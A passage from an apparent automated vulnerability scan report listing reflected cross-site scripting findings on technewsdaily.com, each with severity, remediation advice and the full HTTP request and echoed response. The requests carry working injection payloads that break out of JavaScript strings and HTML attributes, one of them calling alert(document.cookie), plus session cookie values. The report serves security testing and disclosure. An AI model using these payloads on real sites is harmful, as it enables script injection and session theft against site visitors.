<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-protect-your-laptop-in-public-places-1542c21d2'-alert(1)-'dd14ef7e79f/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.79. http://www.technewsdaily.com/how-to-protect-your-laptop-in-public-places-1542/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b6e6'-alert(1)-'4813f8d6b02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-protect-your-laptop-in-public-places-1542/?1b6e6'-alert(1)-'4813f8d6b02=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:51 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66492
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... pe="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-protect-your-laptop-in-public-places-1542/?1b6e6'-alert(1)-'4813f8d6b02=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1fd9'-alert(1)-'eed141cc16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(1)-'eed141cc16/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 01:21:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=vhhlf6ta06dh844q4tbjq58lu6; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 01:21:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40472
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(1)-'eed141cc16/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.81. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/how-to-secure-privacy-on-facebook-0596/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed8c"><a>b9005069e68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /how-to-secure-privacy-on-facebook-0596/?6ed8c"><a>b9005069e68=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 01:21:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=0kgldq7s1maslg6itnbn60b0k3; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 01:21:35 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66230
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/?6ed8c"><a>b9005069e68=1/" /> ...[SNIP]...
1.82. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/how-to-secure-privacy-on-facebook-0596/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31981'-alert(1)-'c34025ad3cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-secure-privacy-on-facebook-0596/?31981'-alert(1)-'c34025ad3cd=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 01:21:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=vtmbdes76tb9oqrq3minn7nti3; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 01:21:49 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65868
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/?31981'-alert(1)-'c34025ad3cd=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 452ca'-alert(1)-'e1700deaaf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16452ca'-alert(1)-'e1700deaaf1/ HTTP/1.1 Host: www.technewsdaily.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-391693423-1292640388971; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; __utmb=246794907.1.10.1292640389; a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:51:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:51:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40564
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... Timeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16452ca'-alert(1)-'e1700deaaf1/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.84. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e001'-alert(1)-'bf03e2ce157 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/?3e001'-alert(1)-'bf03e2ce157=1 HTTP/1.1 Host: www.technewsdaily.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-391693423-1292640388971; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; __utmb=246794907.1.10.1292640389; a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:50:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:50:57 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40574
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... meout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/?3e001'-alert(1)-'bf03e2ce157=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98fe7'-alert(1)-'36170a62c45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc1698fe7'-alert(1)-'36170a62c45/index.php HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:07 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40582
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... Timeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc1698fe7'-alert(1)-'36170a62c45/index.php",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a4dd'-alert(1)-'6f6ba9b182b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/6a4dd'-alert(1)-'6f6ba9b182b HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:13 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40564
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... imeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/6a4dd'-alert(1)-'6f6ba9b182b",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.87. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20de5'-alert(1)-'841408d821b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php?20de5'-alert(1)-'841408d821b=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:51:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:51:55 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40592
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... MSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php?20de5'-alert(1)-'841408d821b=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3533'-alert(1)-'33d994a3a1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-take-good-pictures-with-your-cell-phone-100128-0111a3533'-alert(1)-'33d994a3a1e/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:07 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40514
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... /javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111a3533'-alert(1)-'33d994a3a1e/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.89. http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79067"><a>0a6ebaddcd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /how-to-take-good-pictures-with-your-cell-phone-100128-0111/?79067"><a>0a6ebaddcd6=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:40 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 72109
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/?79067"><a>0a6ebaddcd6=1/" /> ...[SNIP]...
1.90. http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89814'-alert(1)-'e2179e8049f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-take-good-pictures-with-your-cell-phone-100128-0111/?89814'-alert(1)-'e2179e8049f=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:55 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71747
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... avascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/?89814'-alert(1)-'e2179e8049f=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b76c4'-alert(1)-'c5a8d6b261c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /in-the-future-computing-is-cunningly-constant--1800b76c4'-alert(1)-'c5a8d6b261c/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:09 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:09 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40500
